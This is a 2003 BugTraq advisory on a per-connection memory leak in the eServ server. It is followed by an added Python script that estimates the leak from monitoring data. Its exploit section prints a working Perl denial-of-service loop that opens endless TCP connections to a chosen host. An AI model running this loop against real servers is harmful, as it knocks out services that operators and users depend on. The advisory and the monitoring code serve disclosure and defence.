eServ Memory Leak Enables Denial of Service Attacks



----- Original Message -----
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "BugTraq" <bugtraq@securityfocus.com>
Sent: Sunday, May 11, 2003 8:21 AM
Subject: eServ Memory Leak Enables Denial of Service Attacks


> eServ Memory Leak Enables Denial of Service Attacks
>
> I. Product Description
>
> eServ is a hybrid Web server (HTTP), FTP server, mail server (POP3, SMTP,
> Finger), news server (NNTP), and proxy server.  It provides all these
> services in a single package, so that administrators are not required to
> run multiple different packages to support these protocols.
>
> II. Vulnerability Description
>
> eServ's connection handling routine contains a memory leak that may be
> exploited to cause the eServ daemon to become unavailable.  Upon receiving
> a connection, the server allocates a block of memory on the heap between 8
> and 32 kilobytes in size.  The reason for this size variance was not
> isolated.  This block of memory is not freed on disconnect, leading it to
> leak.  After several thousand successful connections, memory use on the
> system becomes exceedingly high.  If memory use on the system becomes
> excessively high, the system may become unusable.
>
> III. Impact
>
> An attacker who can repeatedly establish connections with the eServ daemon
> can cause services running on the vulnerable system (including other
> services outside of eServ's process) to fail.  The vulnerability can
> actually be exploited by accident on high-traffic sites -- each connection
> causes a leak.  After about 1,000 connections, anywhere between 7.81 MB
> and 31.25 MB may leak.
>
> To deprive an average server system of resources to the point of failure,
> a significant number of connections is required.  After 10,000 connections,
> 78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections
> is sufficient to cause system failure.  At this point, 390.5 MB to 1.52 GB
> has leaked.
>
> IV. Vendor Contact
>
> I attempted to contact the vendor via info@eserv.ru and support@eserv.ru.
> The former address bounced, and no response was received from the second
> contact attempt.  eServ has a horrible security record, and I recommend
> using a production server for internet sites.
>
> V. Exploit
>
> #!/usr/bin/perl
> #LEGAL NOTICE: Don't test this on networks you don't administer,
> #and do not test this tool on networks you don't own without
> #permission of the network owner.  You are responsible for all
> #damage due to your use of this tool.
> use IO::Socket;
> print "$0: eServ Remote DoS Exploit\r\n";
> print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
> print "Server hostname\: ";
> $host = trim(chomp($line = <STDIN>));
> print "Service port to probe\: ";
> $port = trim(chomp($line = <STDIN>));
> print "\r\nBeginning probe -- stop with CTRL+C\r\n";
> while (1) {
>  $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
>  undef $f;
> }
>
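
The leak described in sections II and III shows up in monitoring as daemon memory that grows linearly with the number of accepted connections. The following is an added example, not part of the original advisory or the author's code: it fits that line to monitoring samples and projects the remaining headroom. The sample figures, the 512 MiB limit, the 1 KB threshold and the function names are assumptions made for illustration.

```python
# Added example: estimate a per-connection leak from monitoring samples.
# SAMPLES is constructed data: (cumulative connections, daemon RSS in bytes),
# built with a 20 KB/connection leak, inside the advisory's 8-32 KB range.
SAMPLES = [
    (0, 20_000_000),
    (1_000, 40_480_000),
    (2_000, 60_960_000),
    (3_000, 81_440_000),
]


def leak_per_connection(samples):
    """Least-squares slope of RSS against connection count (bytes/connection)."""
    n = len(samples)
    if n < 2:
        raise ValueError("need at least two samples")
    mean_x = sum(x for x, _ in samples) / n
    mean_y = sum(y for _, y in samples) / n
    sxx = sum((x - mean_x) ** 2 for x, _ in samples)
    if sxx == 0:
        raise ValueError("connection count did not change between samples")
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in samples)
    return sxy / sxx


def assess(samples, mem_limit_bytes, min_leak_bytes=1024):
    """Flag a leak and project how many more connections fit under the limit."""
    slope = leak_per_connection(samples)
    _, rss = samples[-1]
    if slope < min_leak_bytes:  # growth too small to attribute to connections
        return {"leaking": False, "bytes_per_conn": slope, "conns_to_limit": None}
    remaining = max(0, mem_limit_bytes - rss)
    return {
        "leaking": True,
        "bytes_per_conn": slope,
        "in_advisory_range": 8 * 1024 <= slope <= 32 * 1024,
        "conns_to_limit": int(remaining // slope),
    }


if __name__ == "__main__":
    print(assess(SAMPLES, mem_limit_bytes=512 * 1024 * 1024))
```

Feeding it real samples (connection counter from the server log, resident size from the process table) gives an early alert and a restart deadline before the host runs out of memory.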
